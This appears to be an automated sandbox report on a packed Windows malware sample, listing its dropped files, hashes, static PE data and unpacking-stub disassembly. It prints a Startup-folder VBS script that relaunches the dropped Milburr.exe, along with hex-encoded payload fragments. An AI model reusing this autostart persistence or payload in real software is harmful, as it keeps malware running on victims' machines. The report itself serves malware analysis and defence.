                                            Preview:u..B[L00SBQS..J8.IBXL00W.QSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ0WIBVS.>W.X.k.Kt.h.0%C.'0>480'.5(,6#D.5'q!??jQ8i....]8&4}G\@.VIBXL00.k...........x.N.{....E.r.#x..].a..p...h.....u.O......l.......q..............zr......x......Y.......#vd.....+w.......+2;....VIBXL00W..SJ.K=V".|+00WBQSJQ.8THIYB 07GQSjSJ8VIBbw30WRQSJ!O8VI.XL 0WBSSJTJ9VIBXL50VBQSJQJ.QIB\L00WBQQJQ.8VYBX\00WBASJAJ8VIBX\00WBQSJQJ8Vi.^L41WBQ3MQ.pVIBXL00WBQSJQJ8VIBX.70.yQSZ.L8nIBXL00WBQSJQJ8VIBXL..QBISJQ..PI.XL00WBQSJQJ8&LB.H00WBQSJQJ8VIBXL00WBQSJQJ8Vg6=4D0WBL.OQJ(VIB8I00SBQSJQJ8VIBXL00wBQ3d#.Y"(BXL.1WB!VJQ.9VI&]L00WBQSJQJ8VI.XLp.3#%2JQJT.IBXL70WLQSJ.L8VIBXL00WBQSJ.J8.g0+>S0WB..JQJXQIB.L00.DQSJQJ8VIBXL00.BQ.d#/T9*BX..0WB.TJQv8VI._L00WBQSJQJ8VI.XLr0WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WBQSJQJ8VIBXL00WB

                                            C:\Users\user\AppData\Local\Temp\aut7743.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\l1QC9H0SNR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):414136
                                            Entropy (8bit):7.981207697530746
                                            Encrypted:false
                                            SSDEEP:12288:QybYqhspyXD4x3fqeDypBCJXqEGsKRjVXByS81PXkU:QghsppFwuqbZVr4XZ
                                            MD5:DF6CE24C1D936B4B56DCD548DEF18B8D
                                            SHA1:BB8CCA79E83C81605FE2B2FFCFB657612FD798A1
                                            SHA-256:FED7B359F763F28D9E01BB5F6C734A29F17A67AE34161F4053DDAC0407F52610
                                            SHA-512:7AEA698B0A2C06812FBE00D0315AF7BA18C15AE572C2EF7088DB28CE3A5B6AB122CE4E711E8FE20D7763A47E8591AFB248A02B55D5059F49F06B3201918648E8
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06......;4*.2a0..5=...8.RhU.......U.T........0..hUj.*}W.V3.M..E..Z.BO0.M'..<bk(.M.tH..Oq...............i}..(......~o..3....9......S.........r.-....p..7...|...>&?..]tT...=....7F...h.9~w<...D=Z..g...^.Z.D+...^1.]Dk'...p...C+...oT......[O......S....KQ(.N....j....V..T.H..hR...Q..`....3.U.@.....@.....iS......]5.U.Gq..hU...TiU.T.Y.V+.....J...b....N..L.L@..6........y...YJd...+.v>...$.<..j.....$.........*.y..iD..)..}F.(..'.. ......,Y$r..P..n.)I.Z.Q..x.j..?...\#.9..d..U!`...aW.....`.....N2.y..}S..81....XD...M......1;$._T..U.d,....)U.......<|w ....?....!.z..3].TdY9.2....&ux.K.2.Cg...6.L.agpz..cy..!...2.w.o...*s..D.:..g0.`gq=...;.D<<...)..n...T.}..Gi.....Q.bgt......i/....s..E)]...X...6..Z...Qg.i..i..v(6..N'...-....?.U.ZY.>..._.T(.>.0.J..JV...ReZi..a..]...F'....-..uZ.9.....%..i.U.u.d6...^i4).z.u..wJMF'...o..gc.Y.Tgui.>q...kt.O....-.y...~..-.....V.|..c.m...Qi=...._...NS.a..-.z.....Zf .T...C.GIU..t..@GH...u.L.QjWB/G.V$.Z.J....jT..W....-.Jp..>.Zk..V.],..(3..

                                            C:\Users\user\AppData\Local\Temp\aut77B1.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\l1QC9H0SNR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):14584
                                            Entropy (8bit):7.63320383966088
                                            Encrypted:false
                                            SSDEEP:384:ITYznw6siKOPb6ZyDWPcq7jisLHk6h8FAeXHxHiWp3isCLf:IAw6sipDqcSLHwFAeRiZsCz
                                            MD5:00360588750369BC243ED68948507859
                                            SHA1:861AF2E9E7E94F3FBABB95259D86F2A93C4EDDB3
                                            SHA-256:71E5D5E454B65C35189F3CC57C5923678F53758420ABF6C3975A0E188FB8D855
                                            SHA-512:C8B360B472A1E0CB8957AFCE1EC644D465EB087B28328D7B3D3C88B3C2870CA885D42D66C9CFAEAE2347D02A87E47DA645A92F16C6140CEB036DF147F91D51DF
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                            C:\Users\user\AppData\Local\Temp\aut7B1B.tmp

                                            Download File
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):414136
                                            Entropy (8bit):7.981207697530746
                                            Encrypted:false
                                            SSDEEP:12288:QybYqhspyXD4x3fqeDypBCJXqEGsKRjVXByS81PXkU:QghsppFwuqbZVr4XZ
                                            MD5:DF6CE24C1D936B4B56DCD548DEF18B8D
                                            SHA1:BB8CCA79E83C81605FE2B2FFCFB657612FD798A1
                                            SHA-256:FED7B359F763F28D9E01BB5F6C734A29F17A67AE34161F4053DDAC0407F52610
                                            SHA-512:7AEA698B0A2C06812FBE00D0315AF7BA18C15AE572C2EF7088DB28CE3A5B6AB122CE4E711E8FE20D7763A47E8591AFB248A02B55D5059F49F06B3201918648E8
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06......;4*.2a0..5=...8.RhU.......U.T........0..hUj.*}W.V3.M..E..Z.BO0.M'..<bk(.M.tH..Oq...............i}..(......~o..3....9......S.........r.-....p..7...|...>&?..]tT...=....7F...h.9~w<...D=Z..g...^.Z.D+...^1.]Dk'...p...C+...oT......[O......S....KQ(.N....j....V..T.H..hR...Q..`....3.U.@.....@.....iS......]5.U.Gq..hU...TiU.T.Y.V+.....J...b....N..L.L@..6........y...YJd...+.v>...$.<..j.....$.........*.y..iD..)..}F.(..'.. ......,Y$r..P..n.)I.Z.Q..x.j..?...\#.9..d..U!`...aW.....`.....N2.y..}S..81....XD...M......1;$._T..U.d,....)U.......<|w ....?....!.z..3].TdY9.2....&ux.K.2.Cg...6.L.agpz..cy..!...2.w.o...*s..D.:..g0.`gq=...;.D<<...)..n...T.}..Gi.....Q.bgt......i/....s..E)]...X...6..Z...Qg.i..i..v(6..N'...-....?.U.ZY.>..._.T(.>.0.J..JV...ReZi..a..]...F'....-..uZ.9.....%..i.U.u.d6...^i4).z.u..wJMF'...o..gc.Y.Tgui.>q...kt.O....-.y...~..-.....V.|..c.m...Qi=...._...NS.a..-.z.....Zf .T...C.GIU..t..@GH...u.L.QjWB/G.V$.Z.J....jT..W....-.Jp..>.Zk..V.],..(3..

                                            C:\Users\user\AppData\Local\Temp\aut7B99.tmp

                                            Download File
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):14584
                                            Entropy (8bit):7.63320383966088
                                            Encrypted:false
                                            SSDEEP:384:ITYznw6siKOPb6ZyDWPcq7jisLHk6h8FAeXHxHiWp3isCLf:IAw6sipDqcSLHwFAeRiZsCz
                                            MD5:00360588750369BC243ED68948507859
                                            SHA1:861AF2E9E7E94F3FBABB95259D86F2A93C4EDDB3
                                            SHA-256:71E5D5E454B65C35189F3CC57C5923678F53758420ABF6C3975A0E188FB8D855
                                            SHA-512:C8B360B472A1E0CB8957AFCE1EC644D465EB087B28328D7B3D3C88B3C2870CA885D42D66C9CFAEAE2347D02A87E47DA645A92F16C6140CEB036DF147F91D51DF
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                            C:\Users\user\AppData\Local\Temp\autADA5.tmp

                                            Download File
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):414136
                                            Entropy (8bit):7.981207697530746
                                            Encrypted:false
                                            SSDEEP:12288:QybYqhspyXD4x3fqeDypBCJXqEGsKRjVXByS81PXkU:QghsppFwuqbZVr4XZ
                                            MD5:DF6CE24C1D936B4B56DCD548DEF18B8D
                                            SHA1:BB8CCA79E83C81605FE2B2FFCFB657612FD798A1
                                            SHA-256:FED7B359F763F28D9E01BB5F6C734A29F17A67AE34161F4053DDAC0407F52610
                                            SHA-512:7AEA698B0A2C06812FBE00D0315AF7BA18C15AE572C2EF7088DB28CE3A5B6AB122CE4E711E8FE20D7763A47E8591AFB248A02B55D5059F49F06B3201918648E8
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06......;4*.2a0..5=...8.RhU.......U.T........0..hUj.*}W.V3.M..E..Z.BO0.M'..<bk(.M.tH..Oq...............i}..(......~o..3....9......S.........r.-....p..7...|...>&?..]tT...=....7F...h.9~w<...D=Z..g...^.Z.D+...^1.]Dk'...p...C+...oT......[O......S....KQ(.N....j....V..T.H..hR...Q..`....3.U.@.....@.....iS......]5.U.Gq..hU...TiU.T.Y.V+.....J...b....N..L.L@..6........y...YJd...+.v>...$.<..j.....$.........*.y..iD..)..}F.(..'.. ......,Y$r..P..n.)I.Z.Q..x.j..?...\#.9..d..U!`...aW.....`.....N2.y..}S..81....XD...M......1;$._T..U.d,....)U.......<|w ....?....!.z..3].TdY9.2....&ux.K.2.Cg...6.L.agpz..cy..!...2.w.o...*s..D.:..g0.`gq=...;.D<<...)..n...T.}..Gi.....Q.bgt......i/....s..E)]...X...6..Z...Qg.i..i..v(6..N'...-....?.U.ZY.>..._.T(.>.0.J..JV...ReZi..a..]...F'....-..uZ.9.....%..i.U.u.d6...^i4).z.u..wJMF'...o..gc.Y.Tgui.>q...kt.O....-.y...~..-.....V.|..c.m...Qi=...._...NS.a..-.z.....Zf .T...C.GIU..t..@GH...u.L.QjWB/G.V$.Z.J....jT..W....-.Jp..>.Zk..V.],..(3..

                                            C:\Users\user\AppData\Local\Temp\autAE23.tmp

                                            Download File
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):14584
                                            Entropy (8bit):7.63320383966088
                                            Encrypted:false
                                            SSDEEP:384:ITYznw6siKOPb6ZyDWPcq7jisLHk6h8FAeXHxHiWp3isCLf:IAw6sipDqcSLHwFAeRiZsCz
                                            MD5:00360588750369BC243ED68948507859
                                            SHA1:861AF2E9E7E94F3FBABB95259D86F2A93C4EDDB3
                                            SHA-256:71E5D5E454B65C35189F3CC57C5923678F53758420ABF6C3975A0E188FB8D855
                                            SHA-512:C8B360B472A1E0CB8957AFCE1EC644D465EB087B28328D7B3D3C88B3C2870CA885D42D66C9CFAEAE2347D02A87E47DA645A92F16C6140CEB036DF147F91D51DF
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                            C:\Users\user\AppData\Local\Temp\autB15E.tmp

                                            Download File
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):414136
                                            Entropy (8bit):7.981207697530746
                                            Encrypted:false
                                            SSDEEP:12288:QybYqhspyXD4x3fqeDypBCJXqEGsKRjVXByS81PXkU:QghsppFwuqbZVr4XZ
                                            MD5:DF6CE24C1D936B4B56DCD548DEF18B8D
                                            SHA1:BB8CCA79E83C81605FE2B2FFCFB657612FD798A1
                                            SHA-256:FED7B359F763F28D9E01BB5F6C734A29F17A67AE34161F4053DDAC0407F52610
                                            SHA-512:7AEA698B0A2C06812FBE00D0315AF7BA18C15AE572C2EF7088DB28CE3A5B6AB122CE4E711E8FE20D7763A47E8591AFB248A02B55D5059F49F06B3201918648E8
                                            Malicious:false
                                            Preview:EA06......;4*.2a0..5=...8.RhU.......U.T........0..hUj.*}W.V3.M..E..Z.BO0.M'..<bk(.M.tH..Oq...............i}..(......~o..3....9......S.........r.-....p..7...|...>&?..]tT...=....7F...h.9~w<...D=Z..g...^.Z.D+...^1.]Dk'...p...C+...oT......[O......S....KQ(.N....j....V..T.H..hR...Q..`....3.U.@.....@.....iS......]5.U.Gq..hU...TiU.T.Y.V+.....J...b....N..L.L@..6........y...YJd...+.v>...$.<..j.....$.........*.y..iD..)..}F.(..'.. ......,Y$r..P..n.)I.Z.Q..x.j..?...\#.9..d..U!`...aW.....`.....N2.y..}S..81....XD...M......1;$._T..U.d,....)U.......<|w ....?....!.z..3].TdY9.2....&ux.K.2.Cg...6.L.agpz..cy..!...2.w.o...*s..D.:..g0.`gq=...;.D<<...)..n...T.}..Gi.....Q.bgt......i/....s..E)]...X...6..Z...Qg.i..i..v(6..N'...-....?.U.ZY.>..._.T(.>.0.J..JV...ReZi..a..]...F'....-..uZ.9.....%..i.U.u.d6...^i4).z.u..wJMF'...o..gc.Y.Tgui.>q...kt.O....-.y...~..-.....V.|..c.m...Qi=...._...NS.a..-.z.....Zf .T...C.GIU..t..@GH...u.L.QjWB/G.V$.Z.J....jT..W....-.Jp..>.Zk..V.],..(3..

                                            C:\Users\user\AppData\Local\Temp\autB333.tmp

                                            Download File
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):14584
                                            Entropy (8bit):7.63320383966088
                                            Encrypted:false
                                            SSDEEP:384:ITYznw6siKOPb6ZyDWPcq7jisLHk6h8FAeXHxHiWp3isCLf:IAw6sipDqcSLHwFAeRiZsCz
                                            MD5:00360588750369BC243ED68948507859
                                            SHA1:861AF2E9E7E94F3FBABB95259D86F2A93C4EDDB3
                                            SHA-256:71E5D5E454B65C35189F3CC57C5923678F53758420ABF6C3975A0E188FB8D855
                                            SHA-512:C8B360B472A1E0CB8957AFCE1EC644D465EB087B28328D7B3D3C88B3C2870CA885D42D66C9CFAEAE2347D02A87E47DA645A92F16C6140CEB036DF147F91D51DF
                                            Malicious:false
                                            Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                            C:\Users\user\AppData\Local\Temp\teer

                                            Download File
                                            Process:C:\Users\user\Desktop\l1QC9H0SNR.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):143378
                                            Entropy (8bit):2.9932403669409404
                                            Encrypted:false
                                            SSDEEP:96:AIXLr44+F05BDjciMi0Fl7dSA6V5vevGcu29IwyJuv35rWVjjYqnBaAJZdjurebD:H3LjC7YmGcu29IwyJuv35rWVgqnBaA
                                            MD5:B98EE815FE928B457A8CA6290CA38293
                                            SHA1:B2A6929D5A5B461AD3AA6A8ED873F2E5FC106FD5
                                            SHA-256:D1DE55CC4B804A902CD9ECBC8C4658586A9B85D4A26F147E49CA17406EBE5C6B
                                            SHA-512:2964C872A41DDAC596490BE2C9B4797EE97294503D509EA8E6B8FC8D43336BF2896189AF88C8A225BB3E59F4127BC7CB81B9C05ED927B813AEB04DE4F80AF5BB
                                            Malicious:false
                                            Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9

                                            C:\Users\user\AppData\Local\obtenebrate\Milburr.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\l1QC9H0SNR.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                            Category:dropped
                                            Size (bytes):921600
                                            Entropy (8bit):7.775145133962969
                                            Encrypted:false
                                            SSDEEP:24576:0rl6kD68JmlotQf1nQr8zKS7ifTcvt2S3Sc1YNTN:Cl328U2yfuo2hfwvtJCxT
                                            MD5:BE20DFFFCBA37064D6087AA714036873
                                            SHA1:4F50F7F954ED27B8E3373A5D900905D98D1BB51E
                                            SHA-256:C889443786DC57C284A40FD1A9764BAD2F026A8C20E191059707D1646FF931E0
                                            SHA-512:955A14D104EDF528CD3D1F140181E6222CC1F88C8F1FB0A6A60FA0D37962B34C535A29E45BA029CF8DAA039DF06D25B26689FEB600FB8B499FE46DE0B3BF4696
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 75%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Wg.........."......`..........`*.......0....@.......................................@...@.......@.....................@...$....0..@...................d.......................................D,..H...........................................UPX0....................................UPX1.....`.......^..................@....rsrc........0.......b..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs

                                            Download File
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):284
                                            Entropy (8bit):3.38394623991052
                                            Encrypted:false
                                            SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1Klxbs7nriIM8lfQVn:DsO+vNlDQ1kkmA2n
                                            MD5:86B98D0A8F987C1D3016FCC2EB957CD5
                                            SHA1:98AF46925D84EF241EB425E57DDF80670FA7E630
                                            SHA-256:E35ED9BC0F1482905A13771C4FC11F91DA24515AB5E759926F4C8E5F1B2E0858
                                            SHA-512:F41AA40F748DE917CE86D40BEA5CD7A4A76F9995D59EDA50ABDA5639DCE92BBC71A0762C26719EC056421AC0A0BB594C0C9FDB981AB46A50FBFFCC32FB1E62EE
                                            Malicious:true
                                            Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.o.b.t.e.n.e.b.r.a.t.e.\.M.i.l.b.u.r.r...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                            Entropy (8bit):7.775145133962969
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.39%
                                            • UPX compressed Win32 Executable (30571/9) 0.30%
                                            • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            File name:l1QC9H0SNR.exe
                                            File size:921'600 bytes
                                            MD5:be20dfffcba37064d6087aa714036873
                                            SHA1:4f50f7f954ed27b8e3373a5d900905d98d1bb51e
                                            SHA256:c889443786dc57c284a40fd1a9764bad2f026a8c20e191059707d1646ff931e0
                                            SHA512:955a14d104edf528cd3d1f140181e6222cc1f88c8f1fb0a6a60fa0d37962b34c535a29e45ba029cf8daa039df06d25b26689feb600fb8b499fe46de0b3bf4696
                                            SSDEEP:24576:0rl6kD68JmlotQf1nQr8zKS7ifTcvt2S3Sc1YNTN:Cl328U2yfuo2hfwvtJCxT
                                            TLSH:F815238BB9D22547D926FEB704230C54C7EBBE1979B87205486F3E1696B3293203B51F
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                            File Icon

                                            Icon Hash:0d2d0d1723293133

                                            Static PE Info

                                            General

                                            Entrypoint:0x562a60
                                            Entrypoint Section:UPX1
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6757B2BE [Tue Dec 10 03:17:18 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:fc6683d30d9f25244a50fd5357825e79

                                            Entrypoint Preview

                                            Instruction
                                            pushad
                                            mov esi, 0050D000h
                                            lea edi, dword ptr [esi-0010C000h]
                                            push edi
                                            jmp 00007F08C8EF734Dh
                                            nop
                                            mov al, byte ptr [esi]
                                            inc esi
                                            mov byte ptr [edi], al
                                            inc edi
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F08C8EF732Fh
                                            mov eax, 00000001h
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc eax, eax
                                            add ebx, ebx
                                            jnc 00007F08C8EF734Dh
                                            jne 00007F08C8EF736Ah
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F08C8EF7361h
                                            dec eax
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc eax, eax
                                            jmp 00007F08C8EF7316h
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc ecx, ecx
                                            jmp 00007F08C8EF7394h
                                            xor ecx, ecx
                                            sub eax, 03h
                                            jc 00007F08C8EF7353h
                                            shl eax, 08h
                                            mov al, byte ptr [esi]
                                            inc esi
                                            xor eax, FFFFFFFFh
                                            je 00007F08C8EF73B7h
                                            sar eax, 1
                                            mov ebp, eax
                                            jmp 00007F08C8EF734Dh
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F08C8EF730Eh
                                            inc ecx
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F08C8EF7300h
                                            add ebx, ebx
                                            jne 00007F08C8EF7349h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc ecx, ecx
                                            add ebx, ebx
                                            jnc 00007F08C8EF7331h
                                            jne 00007F08C8EF734Bh
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jnc 00007F08C8EF7326h
                                            add ecx, 02h
                                            cmp ebp, FFFFFB00h
                                            adc ecx, 02h
                                            lea edx, dword ptr [edi+ebp]
                                            cmp ebp, FFFFFFFCh
                                            jbe 00007F08C8EF7350h
                                            mov al, byte ptr [edx]

                                            Rich Headers

                                            Programming Language:
                                            • [ASM] VS2013 build 21005
                                            • [ C ] VS2013 build 21005
                                            • [C++] VS2013 build 21005
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
                                            • [ASM] VS2013 UPD4 build 31101
                                            • [RES] VS2013 build 21005
                                            • [LNK] VS2013 UPD4 build 31101

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1ed8400x424.rsrc
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1630000x8a840.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1edc640xc.rsrc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
